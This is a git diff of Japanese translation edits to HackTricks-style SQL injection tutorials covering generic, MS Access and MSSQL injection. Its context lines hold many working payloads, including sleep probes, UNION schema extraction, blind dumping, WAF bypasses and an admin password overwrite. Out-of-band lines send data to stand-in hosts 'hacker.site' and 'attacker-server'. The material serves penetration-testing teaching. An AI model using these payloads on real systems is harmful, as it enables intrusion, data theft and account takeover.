+次に、**エラーが出ないようにクエリを修正する方法**を知っておく必要があります。クエリを修正するためには、**データを入力して**、**以前のクエリが新しいデータを受け入れるようにする**か、単に**データを入力して**、**最後にコメント記号を追加する**ことができます。
 
 _エラーメッセージが見える場合や、クエリが正常に動作しているときとそうでないときの違いを見つけることができれば、このフェーズはより簡単になります。_
 
@@ -71,7 +71,7 @@ page.asp?id=1 and 1=2 -- results in false
 
 ### タイミングによる確認
 
-場合によっては、テストしているページに**変化が見られない**ことがあります。したがって、**ブラインドSQLインジェクションを発見する**良い方法は、DBにアクションを実行させ、ページの読み込みに**時間に影響を与える**ことです。\
+場合によっては、テストしているページに**変化が見られない**ことがあります。したがって、**ブラインドSQLインジェクションを発見する**良い方法は、DBにアクションを実行させ、ページの読み込みにかかる**時間に影響を与える**ことです。\
 したがって、SQLクエリに完了するのに多くの時間がかかる操作を連結します：
 ```
 MySQL (string concat and logical ops)
@@ -94,11 +94,11 @@ SQLite
 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
 ```
-場合によっては、**sleep関数が許可されない**ことがあります。その場合、これらの関数を使用する代わりに、クエリを**複雑な操作**を実行させて数秒かかるようにすることができます。_これらの技術の例は、各技術ごとに別途コメントされる予定です（ある場合）_。
+場合によっては、**スリープ関数が許可されない**ことがあります。その場合、これらの関数を使用する代わりに、**複雑な操作を実行する**クエリを作成することができます。_これらの技術の例は、各技術ごとに別々にコメントされる予定です（ある場合）_。
 
 ### バックエンドの特定
 
-バックエンドを特定する最良の方法は、異なるバックエンドの関数を実行しようとすることです。前のセクションの_**sleep**_ **関数**や、これらの関数を使用することができます（[payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)の表）：
+バックエンドを特定する最良の方法は、異なるバックエンドの関数を実行しようとすることです。前のセクションの_**スリープ**_ **関数**や、次のものを使用できます（[payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)の表）：
 ```bash
 ["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
 ["connection_id()=connection_id()"                 ,"MYSQL"],
@@ -169,11 +169,11 @@ SQLite
 1' UNION SELECT null,null-- - Not working
 1' UNION SELECT null,null,null-- - Worked
 ```
-_`null`値を使用するべきです。なぜなら、クエリの両側のカラムの型が同じでなければならない場合があり、nullはすべてのケースで有効だからです。_
+_クエリの両側の列の型が同じでなければならない場合があるため、`null`値を使用する必要があります。nullはすべてのケースで有効です。_
 
-### データベース名、テーブル名、カラム名の抽出
+### データベース名、テーブル名、列名の抽出
 
-次の例では、すべてのデータベースの名前、データベースのテーブル名、テーブルのカラム名を取得します：
+次の例では、すべてのデータベースの名前、データベースのテーブル名、テーブルの列名を取得します：
 ```sql
 #Database names
 -1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@@ -184,11 +184,11 @@ _`null`値を使用するべきです。なぜなら、クエリの両側のカ
 #Column names
 -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
 ```
-_このデータを発見する方法は、異なるデータベースごとに異なりますが、常に同じ方法論です。_
+_異なるデータベースごとにこのデータを発見する方法は異なりますが、常に同じ方法論です。_
 
 ## 隠れたユニオンベースの悪用
 
-クエリの出力が表示されているが、ユニオンベースのインジェクションが達成できない場合、それは**隠れたユニオンベースのインジェクション**の存在を示しています。このシナリオは、しばしばブラインドインジェクションの状況につながります。ブラインドインジェクションをユニオンベースのものに変換するには、バックエンドでの実行クエリを特定する必要があります。
+クエリの出力が表示されているが、ユニオンベースのインジェクションが達成できない場合、それは**隠れたユニオンベースのインジェクション**の存在を示しています。このシナリオはしばしばブラインドインジェクションの状況につながります。ブラインドインジェクションをユニオンベースのものに変換するには、バックエンドでの実行クエリを特定する必要があります。
 
 これは、ブラインドインジェクション技術とターゲットのデータベース管理システム（DBMS）に特有のデフォルトテーブルを使用することで達成できます。これらのデフォルトテーブルを理解するためには、ターゲットDBMSのドキュメントを参照することをお勧めします。
 
@@ -205,14 +205,14 @@ _このデータを発見する方法は、異なるデータベースごとに
 ```
 ## ブラインドSQLiの悪用
 
-この場合、クエリの結果やエラーを見ることはできませんが、クエリが**true**または**false**の応答を**返す**ときに、ページ上の異なる内容があるため、**区別**することができます。\
+この場合、クエリの結果やエラーを見ることはできませんが、クエリが**true**または**false**の応答を**返す**ときに区別することができます。なぜなら、ページ上の内容が異なるからです。\
 この場合、その動作を悪用してデータベースを文字ごとにダンプすることができます:
 ```sql
 ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
 ```
 ## エラー盲目的SQLiの悪用
 
-これは**以前と同じケース**ですが、クエリからの真/偽の応答を区別する代わりに、SQLクエリの**エラー**があるかどうかを**区別する**ことができます（おそらくHTTPサーバーがクラッシュするため）。したがって、この場合、正しく文字を推測するたびにSQLエラーを強制することができます:
+これは**以前と同じケース**ですが、クエリからの真/偽の応答を区別する代わりに、SQLクエリの**エラー**があるかどうかを**区別する**ことができます（おそらくHTTPサーバーがクラッシュするため）。したがって、この場合、正しく文字を推測するたびにSQLエラーを強制することができます：
 ```sql
 AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
 ```
@@ -224,13 +224,13 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
 ```
 ## スタッククエリ
 
-スタッククエリを使用して、**複数のクエリを連続して実行**できます。後続のクエリが実行される間、**結果**は**アプリケーションに返されません**。したがって、この技術は主に**ブラインド脆弱性**に関連して使用され、2つ目のクエリを使用してDNSルックアップ、条件付きエラー、または時間遅延をトリガーできます。
+スタッククエリを使用して、**複数のクエリを連続して実行**できます。後続のクエリが実行される間、**結果**は**アプリケーションに返されない**ことに注意してください。したがって、この技術は主に**ブラインド脆弱性**に関連して使用され、2番目のクエリを使用してDNSルックアップ、条件付きエラー、またはタイムディレイをトリガーできます。
 
-**Oracle**は**スタッククエリ**をサポートしていません。**MySQL、Microsoft**、および**PostgreSQL**はサポートしています: `QUERY-1-HERE; QUERY-2-HERE`
+**Oracle**は**スタッククエリ**をサポートしていません。**MySQL、Microsoft**、および**PostgreSQL**はそれらをサポートしています: `QUERY-1-HERE; QUERY-2-HERE`
 
 ## アウトオブバンドエクスプロイト
 
-**他の**エクスプロイト方法が**機能しなかった**場合、**データベースが情報をあなたが制御する**外部ホストに**流出させる**ように試みることができます。たとえば、DNSクエリを介して:
+**他の**エクスプロイト方法が**機能しなかった**場合、**データベースが**情報をあなたが制御する**外部ホスト**に流出させるように試みることができます。たとえば、DNSクエリを介して:
 ```sql
 select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 ```
@@ -307,17 +307,17 @@ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 
 ### 既存のオブジェクト/ユーザーのパスワードを変更する
 
-そのためには、**「マスターオブジェクト」として名付けられた新しいオブジェクトを作成する**ことを試みるべきです（おそらく**admin**の場合）。
+そのためには、**「マスターオブジェクト」として名付けられた新しいオブジェクトを作成する**（おそらく**admin**の場合）何かを変更する必要があります：
 
 - 名前を**AdMIn**（大文字と小文字の文字）としてユーザーを作成する
 - 名前を**admin=**としてユーザーを作成する
-- **SQLトランケーション攻撃**（ユーザー名やメールに**長さ制限**がある場合） --> 名前を**admin \[たくさんのスペース] a**としてユーザーを作成する
+- **SQLトランケーション攻撃**（ユーザー名またはメールに**長さ制限**がある場合） --> 名前を**admin \[たくさんのスペース] a**としてユーザーを作成する
 
 #### SQLトランケーション攻撃
 
-データベースが脆弱で、ユーザー名の最大文字数が例えば30の場合、ユーザー**admin**を偽装したい場合は、"_admin \[30スペース] a_"というユーザー名を作成し、任意のパスワードを使用してみてください。
+データベースが脆弱で、ユーザー名の最大文字数が例えば30で、ユーザー**admin**を偽装したい場合、"_admin \[30スペース] a_"というユーザー名を作成してみてください。
 
-データベースは、入力された**ユーザー名**がデータベース内に**存在するか**を**確認**します。もし**存在しなければ**、**ユーザー名**を**最大許可文字数**（この場合は"_admin \[25スペース]_"）に**切り捨て**、その後、**データベース内のユーザー「admin」を新しいパスワードで更新する際に、末尾のすべてのスペースを自動的に削除します**（エラーが表示される可能性がありますが、これは成功しなかったことを意味しません）。
+データベースは、入力された**ユーザー名**がデータベース内に**存在するか**を**確認**します。もし**存在しなければ**、**ユーザー名**を**最大許可文字数**（この場合は"_admin \[25スペース]_"に）**切り詰め**、その後、**データベース内のユーザー「admin」を新しいパスワードで更新する際に、末尾のすべてのスペースを自動的に削除します**（エラーが表示される可能性がありますが、これは機能しなかったことを意味しません）。
 
 詳細情報: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
 
@@ -331,11 +331,11 @@ name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
 ```
 ### ON DUPLICATE KEY UPDATE
 
-MySQLの`ON DUPLICATE KEY UPDATE`句は、UNIQUEインデックスまたはPRIMARY KEYで重複する値を生成する行を挿入しようとしたときに、データベースが実行するアクションを指定するために使用されます。以下の例は、この機能がどのように悪用されて管理者アカウントのパスワードを変更するために使用されるかを示しています。
+MySQLの`ON DUPLICATE KEY UPDATE`句は、UNIQUEインデックスまたはPRIMARY KEYで重複する値を生成する行を挿入しようとしたときに、データベースが取るべきアクションを指定するために使用されます。以下の例は、この機能がどのように悪用されて管理者アカウントのパスワードを変更するために利用されるかを示しています。
 
 Example Payload Injection:
 
-注入ペイロードは次のように作成される可能性があり、`users`テーブルに2行を挿入しようとします。最初の行はおとりで、2番目の行は既存の管理者のメールアドレスをターゲットにしてパスワードを更新する意図があります：
+注入ペイロードは次のように作成される可能性があり、`users`テーブルに2行を挿入しようとしています。最初の行はおとりで、2番目の行は既存の管理者のメールアドレスをターゲットにしてパスワードを更新する意図があります：
 ```sql
 INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
 ```
@@ -343,7 +343,7 @@ INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_
 
 - クエリは2つの行を挿入しようとします：1つは `generic_user@example.com` 用、もう1つは `admin_generic@example.com` 用です。
 - `admin_generic@example.com` の行がすでに存在する場合、`ON DUPLICATE KEY UPDATE` 句がトリガーされ、MySQLに既存の行の `password` フィールドを "bcrypt_hash_of_newpassword" に更新するよう指示します。
-- その結果、`admin_generic@example.com` を使用して、bcryptハッシュに対応するパスワードで認証を試みることができます（"bcrypt_hash_of_newpassword" は新しいパスワードのbcryptハッシュを表し、実際の希望するパスワードのハッシュに置き換える必要があります）。
+- その結果、`admin_generic@example.com` を使用して、bcryptハッシュに対応するパスワードで認証を試みることができます（"bcrypt_hash_of_newpassword" は新しいパスワードのbcryptハッシュを表し、実際のパスワードのハッシュに置き換える必要があります）。
 
 ### 情報を抽出する
 
@@ -364,7 +364,7 @@ A new user with username=otherUsername, password=otherPassword, email:FLAG will
 ```sql
 '+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
 ```
-テキストを取得するには、次のようにします:
+テキストを取得するには、次のようにします：
 ```python
 __import__('binascii').unhexlify(hex(215573607263)[2:])
 ```
@@ -377,9 +377,9 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
 #Full ascii uppercase and lowercase replace:
 '+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
 ```
-## ルーティッドSQLインジェクション
+## ルーティングされたSQLインジェクション
 
-ルーティッドSQLインジェクションは、注入可能なクエリが出力を生成するものではなく、注入可能なクエリの出力が出力を生成するクエリに送られる状況です。 ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
+ルーティングされたSQLインジェクションは、注入可能なクエリが出力を生成するものではなく、注入可能なクエリの出力が出力を生成するクエリに送られる状況です。 ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
 
 例:
 ```
@@ -401,7 +401,7 @@ No Space (%20) - ホワイトスペースの代替を使用してバイパス
 ?id=1%0Aand%0A1=1%0A--
 ?id=1%A0and%A01=1%A0--
 ```
-ホワイトスペースなし - コメントを使用してバイパスする
+ホワイトスペースなし - コメントを使用してバイパス
 ```sql
 ?id=1/*comment*/and/**/1=1/**/--
 ```
@@ -411,7 +411,7 @@ No Space (%20) - ホワイトスペースの代替を使用してバイパス
 ```
 ### No commas bypass
 
-No Comma - OFFSET、FROM、およびJOINを使用したバイパス
+No Comma - OFFSET、FROM、JOINを使用したバイパス
 ```
 LIMIT 0,1         -> LIMIT 1 OFFSET 0
 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
@@ -425,7 +425,7 @@ SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
 ?id=1 AnD 1=1#
 ?id=1 aNd 1=1#
 ```
-キーワードを使用したブラックリスト（大文字と小文字を区別しない） - 同等の演算子を使用してバイパスする
+キーワードを使用したブラックリスト（大文字と小文字を区別しない） - 同等の演算子を使用してバイパス
 ```
 AND   -> && -> %26%26
 OR    -> || -> %7C%7C
@@ -444,21 +444,21 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
 ```
 ### カラム名制限のバイパス
 
-まず第一に、**元のクエリとフラグを抽出したいテーブルが同じ数のカラムを持っている場合**、次のようにすることができます: `0 UNION SELECT * FROM flag`
+まず最初に、**元のクエリとフラグを抽出したいテーブルが同じ数のカラムを持っている場合**、次のようにすることができます: `0 UNION SELECT * FROM flag`
 
-**名前を使用せずにテーブルの第三カラムにアクセスすることが可能です**。次のようなクエリを使用します: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`。したがって、sqlinjectionでは次のようになります:
+**名前を使用せずにテーブルの第三カラムにアクセスすることが可能**で、次のようなクエリを使用します: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;` したがって、sqlinjectionでは次のようになります:
 ```bash
 # This is an example with 3 columns that will extract the column number 3
 -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
 ```
-または **カンマバイパス** を使用します:
+または**カンマバイパス**を使用します:
 ```bash
 # In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
 -1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
 ```
 このトリックは[https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)から取られました。
 
-### WAFバイパス提案ツール
+### WAFバイパスサジェスターツール
 
 {% embed url="https://github.com/m4ll0k/Atlas" %}
 
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 1ee3494ef..41067edcf 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -2,13 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## オンラインプレイグラウンド
+## Online Playground
 
 - [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
 
-## DBの制限
+## DB Limitations
 
-### 文字列の連結
+### String Concatenation
 
 文字列の連結は `& (%26)` と `+ (%2b)` 文字を使用して可能です。
 ```sql
@@ -17,7 +17,7 @@
 ```
 ### コメント
 
-MS Accessにはコメントがありませんが、NULL文字を使用してクエリの最後を削除することが可能なようです:
+MS Accessにはコメントがありませんが、NULL文字を使ってクエリの最後を削除することが可能なようです。
 ```sql
 1' union select 1,2 from table%00
 ```
@@ -31,7 +31,7 @@ MS Accessにはコメントがありませんが、NULL文字を使用してク
 
 ### LIMIT
 
-**`LIMIT`** 演算子は **実装されていません**。ただし、**`TOP` 演算子**を使用してSELECTクエリの結果を**最初のNテーブル行に制限する**ことが可能です。`TOP`は、返される行数を表す整数を引数として受け取ります。
+**`LIMIT`** 演算子は **実装されていません**。ただし、**`TOP` 演算子を使用して最初の N テーブル行に SELECT クエリの結果を制限することは可能です**。`TOP` は、返される行数を表す整数を引数として受け取ります。
 ```sql
 1' UNION SELECT TOP 3 attr FROM table%00
 ```
@@ -39,8 +39,8 @@ Just like TOP you can use **`LAST`** which will get the **rows from the end**.
 
 ## UNION Queries/Sub queries
 
-In a SQLi you usually will want to somehow execute a new query to extract information from other tables. MS Access always requires that in **subqueries or extra queries a `FROM` is indicated**.\
-だから、`UNION SELECT`や`UNION ALL SELECT`、または条件内の括弧の中の`SELECT`を実行したい場合は、常に**有効なテーブル名を持つ`FROM`を示す必要があります**。\
+SQLiでは、通常、他のテーブルから情報を抽出するために新しいクエリを実行したいと思うでしょう。MS Accessでは、**サブクエリや追加のクエリでは`FROM`を指定する必要があります**。\
+したがって、`UNION SELECT`や`UNION ALL SELECT`、または条件内の括弧の中の`SELECT`を実行したい場合は、常に**有効なテーブル名を持つ`FROM`を指定する必要があります**。\
 したがって、**有効なテーブル名**を知っておく必要があります。
 ```sql
 -1' UNION SELECT username,password from users%00
@@ -52,7 +52,7 @@ In a SQLi you usually will want to somehow execute a new query to extract inform
 
 **MS Access** は **`'1'=2='3'='asd'=false`** のような **奇妙な構文** を許可します。通常、SQLインジェクションは **`WHERE`** 句の中にあるため、これを悪用できます。
 
-MS Access データベースに SQLi があり、1つの **カラム名が username** であることを知っている（または推測している）とします。そして、それが抽出したいフィールドです。チェイニングイコール技術を使用したときのウェブアプリの異なる応答を確認し、**`Mid`** 関数を使用してサブストリングを取得することで、**ブールインジェクション** を使用してコンテンツを抽出する可能性があります。
+MS Access データベースに SQLi があり、1 つの **カラム名が username** であることを知っている（または推測している）とします。そして、それが抽出したいフィールドです。チェイニングイコール技術を使用したときのウェブアプリの異なる応答を確認し、**`Mid`** 関数を使用してサブストリングを取得することで、**ブールインジェクション** を使用してコンテンツを抽出する可能性があります。
 ```sql
 '=(Mid(username,1,3)='adm')='
 ```
@@ -60,11 +60,11 @@ MS Access データベースに SQLi があり、1つの **カラム名が usern
 ```sql
 '=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='
 ```
-オンラインプレイグラウンドでこれを確認してください。
+_Feel free to check this in the online playground._
 
 ### テーブル名のブルートフォース
 
-チェイニングイコール技術を使用すると、次のように**テーブル名をブルートフォース**することもできます：
+チェイニングイコール技術を使用すると、次のように**テーブル名をブルートフォース**することもできます:
 ```sql
 '=(select+top+1+'lala'+from+<table_name>)='
 ```
@@ -77,9 +77,9 @@ MS Access データベースに SQLi があり、1つの **カラム名が usern
 - Sqlmapの一般的なテーブル名: [https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt](https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt)
 - [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) に別のリストがあります。
 
-### カラム名のブルートフォース
+### 列名のブルートフォース
 
-**現在のカラム名をブルートフォース**するには、次のようにチェイニングイコールのトリックを使用できます:
+**現在の列名をブルートフォース**するには、次のように等号トリックをチェーンさせて使用できます:
 ```sql
 '=column_name='
 ```
@@ -95,11 +95,11 @@ MS Access データベースに SQLi があり、1つの **カラム名が usern
 ```
 ### データのダンプ
 
-私たちはすでに[**チェイニングイコール技術**](ms-access-sql-injection.md#chaining-equals-+-substring) **を使用して現在のテーブルや他のテーブルからデータをダンプする方法**について議論しました。しかし、他にも方法があります：
+私たちはすでに[**チェイニングイコールテクニック**](ms-access-sql-injection.md#chaining-equals-+-substring) **を使用して現在のテーブルや他のテーブルからデータをダンプする方法**について議論しました。しかし、他にも方法があります：
 ```sql
 IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
 ```
-要約すると、クエリは「if-then」ステートメントを使用して、成功した場合は「200 OK」をトリガーし、そうでない場合は「500 Internal Error」をトリガーします。TOP 10 演算子を利用することで、最初の10件の結果を選択できます。その後、LASTを使用することで、10番目のタプルのみを考慮できます。その値に対して、MID演算子を使用することで、単純な文字比較を行うことができます。MIDとTOPのインデックスを適切に変更することで、すべての行の「username」フィールドの内容をダンプできます。
+要約すると、クエリは成功した場合に「200 OK」をトリガーし、そうでない場合には「500 Internal Error」をトリガーするために「if-then」ステートメントを使用します。TOP 10 演算子を利用することで、最初の10件の結果を選択することが可能です。その後のLASTの使用により、10番目のタプルのみを考慮することができます。その値に対して、MID演算子を使用することで、単純な文字比較を行うことができます。MIDとTOPのインデックスを適切に変更することで、すべての行の「username」フィールドの内容をダンプすることができます。
 
 ### 時間ベース
 
@@ -126,7 +126,7 @@ and MSysObjects.name not like '~*'
 and MSysObjects.name not like 'MSys*'
 order by MSysObjects.name
 ```
-しかし、`MSysObjects` テーブルを読むアクセス権がない場合に SQL インジェクションを見つけることは非常に一般的であることに注意してください。
+しかし、`MSysObjects` テーブルを読み取るアクセス権がない場合に SQL インジェクションを見つけることは非常に一般的であることに注意してください。
 
 ## ファイルシステムアクセス
 
@@ -136,7 +136,7 @@ order by MSysObjects.name
 
 `http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
 
-MS Access は **ウェブディレクトリのフルパスを含むエラーメッセージ** で応答します。
+MS Access は **ウェブディレクトリのフルパス名を含むエラーメッセージ** で応答します。
 
 ### ファイル列挙
 
@@ -144,7 +144,7 @@ MS Access は **ウェブディレクトリのフルパスを含むエラーメ
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00`
 
-ファイルを列挙する別の方法は、**データベース.table アイテムを指定することです**。**指定されたファイルが存在する場合**、MS Access は **データベース形式エラーメッセージ** を表示します。
+ファイルを列挙する別の方法は、**データベース.テーブル項目を指定すること**です。**指定されたファイルが存在する場合**、MS Access は **データベース形式エラーメッセージ** を表示します。
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00`
 
diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md
index efa0ed444..067fa95fb 100644
--- a/src/pentesting-web/sql-injection/mssql-injection.md
+++ b/src/pentesting-web/sql-injection/mssql-injection.md
@@ -1,15 +1,15 @@
-# MSSQL Injection
+# MSSQLインジェクション
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Active Directory enumeration
+## Active Directory列挙
 
-**SQLインジェクションを使用してMSSQLサーバー内のドメインユーザーを列挙することが可能です**。以下のMSSQL関数を使用します：
+次のMSSQL関数を使用して、**MSSQLサーバー内でSQLインジェクションを介してドメインユーザーを列挙する**ことが可能です：
 
 - **`SELECT DEFAULT_DOMAIN()`**: 現在のドメイン名を取得します。
-- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: ドメイン名（この例では_DOMAIN_）がわかっている場合、この関数は**ユーザーAdministratorのSID**を16進数形式で返します。これは`0x01050000000[...]0000f401`のように見え、**最後の4バイト**が**ビッグエンディアン**形式で**500**という数値であることに注意してください。これは**ユーザーadministratorの一般的なID**です。\
+- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: ドメイン名（この例では_DOMAIN_）がわかっている場合、この関数は**ユーザーAdministratorのSID**を16進数形式で返します。これは`0x01050000000[...]0000f401`のように見えます。**最後の4バイト**が**ビッグエンディアン**形式で**500**という数値であり、これは**ユーザーadministratorの一般的なID**です。\
 この関数を使用すると、**ドメインのIDを知ることができます**（最後の4バイトを除くすべてのバイト）。
-- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : この関数は、指定されたIDの**ユーザー名を返します**（存在する場合）、この場合**0000e803**はビッグエンディアンで== **1000**（通常、これは最初に作成された通常のユーザーIDのIDです）。次に、1000から2000までのユーザーIDをブルートフォースして、ドメインのすべてのユーザー名を取得できると想像できます。例えば、次のような関数を使用して：
+- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : この関数は、指定されたIDの**ユーザー名を返します**（存在する場合）、この場合**0000e803**はビッグエンディアンで== **1000**（通常、これは最初に作成された通常のユーザーIDのIDです）。次に、1000から2000までのユーザーIDをブルートフォースして、ドメインのユーザーのすべてのユーザー名を取得できると想像できます。たとえば、次のような関数を使用して：
 ```python
 def get_sid(n):
 domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
@@ -19,7 +19,7 @@ return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
 ```
 ## **代替エラーベースのベクター**
 
-エラーベースのSQLインジェクションは通常、`+AND+1=@@version--`のような構造や「OR」演算子に基づく変種に似ています。このような式を含むクエリは通常WAFによってブロックされます。バイパスとして、%2b文字を使用して特定の関数呼び出しの結果と文字列を連結し、求めるデータに対してデータ型変換エラーを引き起こします。
+エラーベースのSQLインジェクションは通常、`+AND+1=@@version--`のような構文や「OR」演算子に基づくバリエーションに似ています。このような式を含むクエリは通常、WAFによってブロックされます。バイパスとして、%2b文字を使用して、求められるデータに対してデータ型変換エラーを引き起こす特定の関数呼び出しの結果と文字列を連結します。
 
 このような関数のいくつかの例：
 
@@ -39,7 +39,7 @@ https://vuln.app/getItem?id=1'%2buser_name(@@version)--
 
 ## SSRF
 
-これらのSSRFトリックは[こちらから取得されました](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
+これらのSSRFトリックは[ここから取得されました](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
 
 ### `fn_xe_file_target_read_file`
 
@@ -85,7 +85,7 @@ EXEC sp_helprotect 'fn_trace_gettabe';
 ```
 ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
 
-`xp_dirtree`のようなストアドプロシージャは、Microsoftによって公式に文書化されていないものの、MSSQL内のネットワーク操作における有用性から、他の人々によってオンラインで説明されています。これらのプロシージャは、さまざまな[例](https://www.notsosecure.com/oob-exploitation-cheatsheet/)や[投稿](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/)で示されているように、アウトオブバンドデータの抽出にしばしば使用されます。
+`xp_dirtree`のようなストアドプロシージャは、Microsoftによって公式に文書化されていないものの、MSSQL内でのネットワーク操作における有用性から、他の人々によってオンラインで説明されています。これらのプロシージャは、さまざまな[例](https://www.notsosecure.com/oob-exploitation-cheatsheet/)や[投稿](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/)で示されているように、Out of Band Data exfiltrationでよく使用されます。
 
 例えば、`xp_dirtree`ストアドプロシージャはネットワークリクエストを行うために使用されますが、TCPポート445のみに制限されています。ポート番号は変更できませんが、ネットワーク共有からの読み取りを許可します。使用法は以下のSQLスクリプトで示されています:
 ```sql
@@ -93,25 +93,25 @@ DECLARE @user varchar(100);
 SELECT @user = (SELECT user);
 EXEC ('master..xp_dirtree "\\' + @user + '.attacker-server\\aa"');
 ```
-この方法は、デフォルト設定の `Windows Server 2016 Datacenter` 上で動作する `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` のようなすべてのシステム構成で機能しない可能性があることに注意が必要です。
+この方法は、`Windows Server 2016 Datacenter`上でデフォルト設定で動作している`Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)`など、すべてのシステム構成で機能しない可能性があることに注意が必要です。
 
-さらに、同様の結果を得るために使用できる代替のストアドプロシージャとして `master..xp_fileexist` と `xp_subdirs` があります。 `xp_fileexist` に関する詳細は、こちらの [TechNet article](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) で確認できます。
+さらに、`master..xp_fileexist`や`xp_subdirs`のような代替ストアドプロシージャも、同様の結果を得ることができます。`xp_fileexist`に関する詳細は、この[TechNet記事](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx)で確認できます。
 
 ### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>
 
-明らかに、**`xp_cmdshell`** を使用して **SSRF** を引き起こす何かを **実行** することもできます。詳細については、ページの **関連セクションを読む** ：
+明らかに、**`xp_cmdshell`**を使用して**SSRF**を引き起こす何かを**実行**することもできます。詳細については、ページの**関連セクションを読む**：
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/
 {{#endref}}
 
-### MSSQL ユーザー定義関数 - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
